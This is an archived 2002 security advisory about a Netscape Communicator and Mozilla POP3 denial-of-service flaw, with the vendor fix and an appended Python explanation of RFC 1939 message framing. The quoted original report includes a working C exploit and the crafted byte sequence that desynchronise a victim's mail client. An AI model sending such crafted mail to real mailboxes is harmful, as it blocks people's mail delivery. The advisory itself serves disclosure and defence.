SecurityTracker.com
SecurityTracker Archives

Category:   Application (E-mail Client)  >   Netscape Communicator
Vendors:   America Online, Inc.
Netscape Communicator Mail Download Can Be Crashed By Remote Users Sending Malicious E-mail via POP3
SecurityTracker Alert ID:  1004571
SecurityTracker URL:  http://securitytracker.com/id/1004571
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 18 2002
Impact:   Denial of service via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 4.77 and prior versions
Description:   A vulnerability was reported in the e-mail component of older versions of Netscape Communicator. A remote user can send a specially crafted e-mail message that causes the Netscape e-mail client to fail while downloading messages from a POP3 server.

It is reported that the specially crafted e-mail message can cause the mail client to desynchronize with the POP3 server, effectively stopping the download in progress.

A mail message that contains a single dot ('.') on a line of its own, followed by more text on the following lines, will reportedly trigger the flaw. The client incorrectly interprets the single dot as the end of the mail message and attempts to download the next message (even though the current message is not finished). This will likely cause the client to disconnect from the server.

Impact:   A remote user can send a message that will cause the client to stop downloading messages.
Solution:   The vendor fixed the issue in version 4.79.
Vendor URL:  browsers.netscape.com/browsers/main.tmpl
Cause:   Exception handling error, Input validation error
Underlying OS:  Linux (Any), Apple (Legacy "classic" Mac), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Another small DoS on Mozilla <= 1.0 through pop3


////////////////////////////////////////////
///// Strange Software Behaviour Report
///
//// discovered, understood and exploited between 05, 08 2001
//// (yes, i took the time... :) )
///  eldre8
Wed Jun 12 20:47:59 CEST 2002

\/\/\_/-> System affected:
        Netscape v =<4.77
        Mozilla <1.1

^\/\/'\-> System not affected:
        Outlook Express 4.72.3110.5
        maybe the other versions of Outlook

|_/\/\\/> Buggy software team contacted about this:
        Yes, the bug is fixed now.

/\/\/\_/> Exploitation: remote & very easy & very anonymous :(

_/\/\/\_> Effects: With this remote hole, we can block any mail
        box that is checked with a pop3 client, so the
        hotmail, yahoo like servers are not affected.
        A mail will cause the pop3 client to desynchronize
        with the server, losing the connection to it, and
        so leaves all messages on the server (explained later)...

-/\/\/\/> Explanation: In the SMTP protocol, we can send mail with
        some introduction commands (ehlo,mail,rcpt) and then
        type our messages and place a dot at a new line to
        specify to the MTA that it is the end of the message.
        On the other side, when a POP3 client checks mail, it
        connects to the server, retrieves the mail, and terminates
        the download of a message when it sees a dot at a new line.
        And here is the trick.
        If we can place a dot at a new line, and place other
        words below this dot, the client will believe the mail
        is finished and will try to download the next messages, thus
        being desynchronized with the server...
        The POP3 client acts as:
            login on to the POP3 server
            retrieve mails
            delete mails
            logout
        but if it is desynchronized, it will retrieve mail, and
        disconnect, thus not deleting mails, and the next time
        it logs in, it will find the same mail again, will retrieve
        the mails one more time, disconnect, and so on and on...
        A more detailed explanation,
        here it is a simple end of a normal mail:
            blabla...
            \x0a
            \x0a
        and this is the bad mail:
            blabla...
            \x0a\x0d\x2e\x0d\x20\x0a\x0a\x0a
            blabla...
            \x0a\x20\x00
            \x0a
        We can see the two 0x0a at the end; it seems that they are just
        placed here by the console...forget them.
        At this stage, you could catch the bug...

=\/\/\/-> Possible fixes: There are different ways to fix this,
        - one way is from the client, to stop the bad mail,
            this is to connect manually via telnet to the pop3
            server, and then identify the bad message and do a
            dele <# of the message>
        - one better way is to fix this from the client itself,
            the client can get the size of each message via
            the list command, so it should be able to retrieve
            the complete message, not less, not more...
        - one way is to fix the MTA so it will not accept such
            the code below...

~\/\/\/~> (buggy:])Exploit:

/* this is the code that comes with my
 * advisory #1 to illustrate this...
 * eldre8 at afturgurluk (double dot minus one) org
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define MX "localhost"
#define EHLO "EHLO mx\r\n"
#define MAIL "MAIL FROM: root@localhost\r\n"
#define RCPT "RCPT TO: root@localhost\r\n"
#define DATA "DATA\r\n"
#define QUIT "QUIT\r\n"

#define PORT 25

/* length of a string literal without its terminating NUL,
 * so the NUL is not sent to the MTA after each command */
#define LIT_LEN(s) (sizeof(s) - 1)

int sock;
char buffer[255];

void SigCatch(int sig) {
    (void)sig;
    fprintf(stderr, "\b\bbye!\n");
    close(sock);
    exit(0);
}

int main() {
    /* I was too lame to implement the command line... :) */
    int i;
    struct sockaddr_in sout;
    struct hostent *hp;

    signal(SIGINT, SigCatch);

    hp=gethostbyname(MX);
    if (hp==NULL) {
        fprintf(stderr, "gethostbyname: cannot resolve %s\n", MX);
        return -1;
    }
    sock=socket(AF_INET, SOCK_STREAM, 0);
    if (sock<0) {
        perror("sock");
        return -1;
    }

    memset(&sout, 0, sizeof(sout));
    sout.sin_family=AF_INET;
    sout.sin_port=htons(PORT);
    memcpy(&(sout.sin_addr), *(hp->h_addr_list), sizeof(struct in_addr));
    if (connect(sock, (struct sockaddr *)&sout, sizeof(sout))<0) {
        perror("connect");
        return -1;
    }
    recv(sock, buffer, 255, 0); /* receive the banner... */
    send(sock, EHLO, LIT_LEN(EHLO), 0);
    recv(sock, buffer, 255, 0); /* receive the welcome message... */
    send(sock, MAIL, LIT_LEN(MAIL), 0);
    recv(sock, buffer, 255, 0); /* receive the acknowledgement to mail from. */
    send(sock, RCPT, LIT_LEN(RCPT), 0);
    recv(sock, buffer, 255, 0); /* idem, but for the rcpt to... */
    send(sock, DATA, LIT_LEN(DATA), 0);
    recv(sock, buffer, 255, 0);
    /* the message body: a dot framed by bare CRs, then more text */
    i=sprintf(buffer, "b4d maIl 1n 4KT1oN!\n\x0a\x0d\x2e\x0d\x20\x0a\x0a\nblabla...\x0a\x20");
    /* the NUL byte shown in the advisory (a char, not a string literal,
     * which would store a pointer value instead of 0) */
    *(buffer+i)='\0';
    sprintf(buffer+i+1, "\n.\n"); /* SMTP end-of-data after the NUL */
    send(sock, buffer, i+1+3, 0); /* send the dumb thing ... */
    recv(sock, buffer, 255, 0);
    send(sock, QUIT, LIT_LEN(QUIT), 0);
    recv(sock, buffer, 255, 0);
    close(sock);

    return 0;
}

=_-/\/`-> Greetz/Shouts:
    all who know me, and all that I forget here for anonymity reasons...
    especially french speaking boys & girls! ;)
    And special to anyone in search of knowledge and those who distribute
    knowledge.

You can find this report on: afturgurluk.org/~eldre8/files/pop3client_dos.txt
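The client-side fix in the advisory's second bullet (read exactly the message the server delimits, no less and no more) and the single-dot rule in the SecurityTracker description above both come down to RFC 1939 framing: a POP3 multi-line response ends only with CRLF '.' CRLF, the server byte-stuffs any body line that starts with '.', the client un-stuffs it, and a bare CR or bare LF inside a line is ordinary data, not a line break. The example below is added here and is not code from the advisory, from Netscape or from Mozilla; it models a server that frames a RETR reply correctly and two clients reading it, one that follows RFC 1939 and one constructed to mirror the faulty behaviour the advisory describes (any of CR, LF or CRLF taken as a line end). The message bytes are constructed from the advisory's description of the "bad mail".

```python
"""POP3 multi-line response framing per RFC 1939 section 3 (added example)."""
import re

# Constructed sample: the "bad mail" from the advisory as a POP3 server stores
# it, i.e. CRLF-terminated lines, one of which is CR '.' CR SP with no CRLF
# around the dot. A line starting with '.' is added to exercise byte-stuffing.
BAD_MAIL = (
    b"b4d maIl 1n 4KT1oN!\r\n"
    b"\r\n"
    b"\r.\r \r\n"        # bare CR, dot, bare CR, space: not a terminator line
    b"\r\n"
    b"blabla...\r\n"
    b" \x00\r\n"
    b".hidden line that the server must byte-stuff\r\n"
)


def encode_retr_response(body: bytes) -> bytes:
    """Server side: status line, byte-stuffed body, CRLF '.' CRLF terminator.

    Lines are split on CRLF only; a bare CR or LF stays inside its line.
    """
    if not body.endswith(b"\r\n"):
        body += b"\r\n"
    out = bytearray(b"+OK %d octets\r\n" % len(body))
    for line in body[:-2].split(b"\r\n"):
        if line.startswith(b"."):
            out += b"."          # byte-stuff: leading '.' becomes '..'
        out += line + b"\r\n"
    out += b".\r\n"              # the only way a multi-line response ends
    return bytes(out)


def _consume_status_line(data: bytes) -> bytes:
    """Strip the '+OK ...' CRLF status line; raise on '-ERR' or no CRLF yet."""
    end = data.find(b"\r\n")
    if end == -1:
        raise ValueError("incomplete status line; keep reading from the socket")
    if not data[:end].startswith(b"+OK"):
        raise ValueError("server rejected the command: %r" % data[:end])
    return data[end + 2:]


def read_retr_rfc1939(data: bytes):
    """Correct client: returns (message body, bytes left unread in the stream).

    Only a line that is exactly '.' terminated by CRLF ends the response;
    any other line starting with '.' has one leading '.' removed.
    """
    data = _consume_status_line(data)
    body = bytearray()
    pos = 0
    while True:
        end = data.find(b"\r\n", pos)
        if end == -1:
            raise ValueError("incomplete multi-line response; keep reading")
        line = data[pos:end]
        pos = end + 2
        if line == b".":
            return bytes(body), data[pos:]
        if line.startswith(b"."):
            line = line[1:]      # undo byte-stuffing
        body += line + b"\r\n"


_ANY_BREAK = re.compile(rb"\r\n|\r|\n")


def read_retr_naive(data: bytes):
    """Constructed model of the faulty client: CR, LF or CRLF all end a line.

    With BAD_MAIL this stops at the '.' between the two bare CRs, so the
    rest of the message is left in the stream and is misread as the next
    server response: the desynchronisation the advisory describes.
    """
    data = _consume_status_line(data)
    body = bytearray()
    pos = 0
    while True:
        m = _ANY_BREAK.search(data, pos)
        if m is None:
            raise ValueError("incomplete multi-line response; keep reading")
        line = data[pos:m.start()]
        pos = m.end()
        if line == b".":
            return bytes(body), data[pos:]
        if line.startswith(b"."):
            line = line[1:]
        body += line + b"\r\n"


if __name__ == "__main__":
    stream = encode_retr_response(BAD_MAIL) + b"+OK 1 messages\r\n"  # next reply queued
    good_body, good_rest = read_retr_rfc1939(stream)
    bad_body, bad_rest = read_retr_naive(stream)
    print("RFC 1939 reader recovered full message:", good_body == BAD_MAIL)
    print("RFC 1939 reader left in stream:", good_rest)
    print("naive reader recovered full message:", bad_body == BAD_MAIL)
    print("naive reader left in stream (not a status line):", bad_rest[:16])
```

The round trip `read_retr_rfc1939(encode_retr_response(body))` returns `body` unchanged for any byte string, including one containing a bare-CR-framed dot or a NUL, because framing decisions depend only on CRLF boundaries and on the un-stuffed dot line. A client built this way never needs the LIST octet count the advisory proposes as a cross-check, though comparing the two is a cheap extra sanity test when talking to servers of unknown quality.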

Copyright 2021, SecurityGlobal.net LLC